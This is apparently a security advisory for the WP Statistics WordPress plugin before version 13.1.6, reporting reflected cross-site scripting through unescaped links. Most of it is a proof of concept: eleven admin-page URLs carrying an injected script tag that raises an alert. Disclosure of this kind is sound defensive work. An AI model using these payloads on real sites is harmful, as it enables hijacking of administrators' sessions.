WP Statistic < 13.1.6 – Reflected Cross-Site Scripting

Description

The plugin does not escape various generated links before outputting them back in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=wps_visitors_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_referrers_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_hits_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_searches_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_pages_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_categories_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_tags_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_authors_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_browser_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_platform_page&"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=wps_referrers_page&referr=wp.lab&"><script>alert(/XSS/)</script>